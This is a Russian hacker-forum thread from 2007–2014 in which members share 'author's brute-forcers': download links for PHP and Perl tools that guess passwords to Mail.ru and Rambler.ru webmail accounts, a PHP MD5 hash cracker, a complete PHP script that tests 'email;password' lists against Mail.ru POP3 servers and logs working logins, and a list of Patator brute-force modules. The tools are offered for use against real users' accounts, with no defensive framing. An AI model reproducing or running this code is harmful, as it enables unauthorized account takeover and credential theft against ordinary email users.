1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Авторские брутфорсеры

Тема в разделе "Сканеры|:|Брут", создана пользователем Constantine, 17 окт 2007.

  1. Constantine
    Constantine Guest
    PHP брутфорсеры
    by Nomer1

    Rambler.ru

    Код:
    Написал ещё один брут, но уже для Rambler.Ru. Отличается от брута mail.ru только функцией login :)
    
    Download:
     - !WeB:FilE!
     - |sLiL.Ru|
    
    Для этого требуется:
     - Хостинг с поддержкой file_get_contents()
     - Поставить права на файлы 777
    
    Никаких сокетов не требуется.
    Mail.ru
    Код:
    Написал брут для почтового сервиса Mail.Ru.
    
    Download:
     - ^WEB.FILE^
     - .$slil.ru.
    
    Для этого требуется:
     - Хостинг с поддержкой file_get_contents()
     - Поставить права на файлы 777
    
    Никаких сокетов не требуется.
    
    Реализованно конечно не суперски, но работает.
    Прокси не сделал, так как они там не требуются, но сделать их никому не составит труда.
    Брутер by Anvil (XNA)

    PHP:
    <?php
    // от Anvil'а

    //стандартное время выполнение скриптов
    set_time_limit(0);
    //мах кол-во знаков,хеш,приписка
    function md5_hack($num,$hash,$str)
    {
    //Символьный набор
    $simvols=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2","3","4","5","6","7","8","9","0");
    foreach(
    $simvols as $value)
        {
    //формирование строки для брута
    $cur=$value.$str;
    //условия выхода(найдено значение)
    if(md5($cur)==$hash)
            {
    //вывод результатв

    $fp fopen("log.txt""a");

    print 
    "$cur";
    fwrite($fpstr_replace("\n""\t"md5($cur)." - ".$cur."") . "\n");

           break;
            }
    //выход из функции
    if(strlen($cur)==$num+1)break;
    //рекурсивный вызов
    md5_hack($num,$hash,$cur);
        }
    }
    //список хэшей
    md5_hack(9,"5F4DCC3B5AA765D61D8327DEB882CF99","");
    md5_hack(9,"5F4DCC3B5AA765D61D8327DEB882CF99","");
    md5_hack(9,"5F4DCC3B5AA765D61D8327DEB882CF99","");
    md5_hack(9,"5F4DCC3B5AA765D61D8327DEB882CF99","");





    ?>

    Perl


    by Genom--

    mail.ru
    Код:
    вот оно волосатое чудовище медленно и неуклюже выползающее из норки .......... ой чет я как то не так начал -- вообщем привет вам всем -- руки не отсохли - правда мазоль на попе уже натер но эт не беда у меня крем есть 
    
    итак новая версия брутера мыл на мейле -- первоначально я туда уже дописал и яндекс с рамблером -- но эти плохие дяди прям перед релизо внедрили антибот картинку так что их брутьте брутусом по pop3 =)
    
    итак для тех кто хз что за скрипт юзайте поиск и ищите первую версию там есть описание
    
    итак что нового вас ждет в v 4.0 
    
    комменты сделал более подробными и юсадж в скрипте 
    
    вообщемто две смачные пежни 
    
    первая - автоматическая выкачка словаря для перебора -- далее происходит его последующее сохранение в pass.txt и брут по нему 
    для такого метода запускайте скрипт так :
    mail.pl wget http://xz.4to.za.site/slovar.txt
    
    вторая - посимвольный брут - его требовали от меня давно =) - итак тут немного сложнее - в конфиге описан массив @chr=('',0..9,a-z); -- который символизирует набор символов из которых будут составляться пароли -- кроме того если вы хотите чтобы брут всегда начинался с символьного перебора то можете выставить $br=1; в конфиге 
    такс для начала посимвольно брута или выставляйте флаг или запускайте: mail.pl brute
    
    вы увидите следующий диалог:
    
    C:\mail 4.0>mail.pl brute
    ########## GeNoM-- mail.ru bruter v 4.0 || icq^963202 ###############
    Start brute in Thu Jul 26 23:29:58 2007
    
    ~~~~~  total mails:2 and password:8  ~~~~~
    
    Insert min length or press enter by 1->1
    Insert max length->5
    
    введете минимальную и максимальную длину пароля и начнется перебор -- максимальная длина пароля в 9 символов (можете увеличить найдите в коде массив @pas и допишите в него в начало еще нулей)
    
    ну вродебы все если че незабыл - выставил оптимальный max_size и ща запросы летают =)
    
    сливайте на http://genom.h10.ru в самом верху
    http://slil.ru/24674461
      http://www.rapidshare.ru/355866 
    
    
    надеюсь небудет багов -- протестил как смог - щас делаю ремонт в квартире так что слишком досконально его не терзал -- если чето будет глючить пишите тут -- все быстро подправим
    ps я в курсе что этот брутер был на ксакепе -- кста надо купить номер с диском на память
    всем удачи =)


    У вас есть что добавить? Тогда создаем собщение, ждем минуту и удаляем его, получаем +4, а брутер добавляеться в первый пост
     
    Последнее редактирование модератором: 24 ноя 2007
    17 окт 2007
  2. Хел
    Хел Новичок
    Симпатии:
    201
    Mail.ru Bruter

    PHP:
    <?php

    /*******************************/
    #
    # Mail.ru Bruter by Helkern
    # ICQ: 261-333
    # (c) www.Xaker.Name
    #
    /*******************************/

    error_reporting(0);
    set_time_limit(0);

    echo 
    "[*] Mail.ru Bruter by Helkern\n\n";
    if(
    $argc!=5) {
    echo 
    "[!] Using:\n\n";
    echo 
    "\t\t-m   List \"mail;password\".\n";
    echo 
    "\t\t-l   Log file.\n";
    exit();
    }
    else {
    $c=1;
    while(
    $c<=$argc) {
    switch(
    $argv[$c]) {
    case 
    "-m"$maillist=$argv[$c+1]; break;
    case 
    "-l"$logfile=$argv[$c+1]; break;
    }
    $c++;
    }
    $date=date("d.m.y");
    $time=date("H:i:s");
    $mails=0;
    $countm=fopen($maillist"r");
    while(
    fgets($countm1024))
    $mails++;
    fclose($countm);
    echo 
    "[!] Brute started at $date - $time\n";
    echo 
    "[!] Mail count: $mails\n";
    $mailop=fopen($maillist"r");
    while(!
    feof($mailop)) {
    $mread=trim(fgets($mailop1024));
    $getit=explode(";"$mread);
    $getit2=explode("@"$getit[0]);
    $login=$getit2[0];
    $domain=$getit2[1];
    $password=$getit[1];
    if(!
    $sock=fsockopen("pop.".$domain110$errno$errstr30)) {
    $sock=fsockopen("pop.".$domain110$errno$errstr30);
    }
    else {
    echo 
    "[!] Trying now: $getit[0]:$password\n";
    $s1=fread($sock1024);
    fwrite($sock"user $login\n");
    $s2=fread($sock1024);
    if(
    eregi"OK Password required for user"$s2)) {
    fwrite($sock"pass $password\n");
    $s4=fread($sock1024);
    if(
    eregi("OK $login.$domain maildrop has"$s4)) {
    $log=fopen($logfile"a+");
    fwrite($log$getit[0].":".$password);
    fclose($log);
    echo 
    "[!] $getit[0]:$password is correct\n";
    }
    else
    echo 
    "[!] $getit[0]:$password is incorrect\n";
    }
    }
    }
    }
    fclose($sock);
    fclose($maillist)

    ?>
     
    Последнее редактирование: 27 янв 2008
    17 янв 2008
    2 пользователям это понравилось.
  3. DarkJoker
    DarkJoker Banned
    Симпатии:
    0
    http://code.google.com/p/patator/

    питон,змей большой сами возмёте товарищи)

    Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
    Currently it supports the following modules:
    * ftp_login : Brute-force FTP
    * ssh_login : Brute-force SSH
    * telnet_login : Brute-force Telnet
    * smtp_login : Brute-force SMTP
    * smtp_vrfy : Enumerate valid users using the SMTP VRFY command
    * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
    * finger_lookup : Enumerate valid users using Finger
    * http_fuzz : Brute-force HTTP/HTTPS
    * pop_login : Brute-force POP
    * pop_passd : Brute-force poppassd (not POP3)
    * imap_login : Brute-force IMAP
    * ldap_login : Brute-force LDAP
    * smb_login : Brute-force SMB
    * smb_lookupsid : Brute-force SMB SID-lookup
    * rlogin_login : Brute-force rlogin
    * vmauthd_login : Brute-force VMware Authentication Daemon
    * mssql_login : Brute-force MSSQL
    * oracle_login : Brute-force Oracle
    * mysql_login : Brute-force MySQL
    * mysql_query : Brute-force MySQL queries
    * pgsql_login : Brute-force PostgreSQL
    * vnc_login : Brute-force VNC
    * dns_forward : Brute-force DNS
    * dns_reverse : Brute-force DNS (reverse lookup subnets)
    * snmp_login : Brute-force SNMPv1/2 and SNMPv3
    * unzip_pass : Brute-force the password of encrypted ZIP files
    * keystore_pass : Brute-force the password of Java keystore files
    * umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
     
    7 июн 2014

Поделиться этой страницей

Загрузка...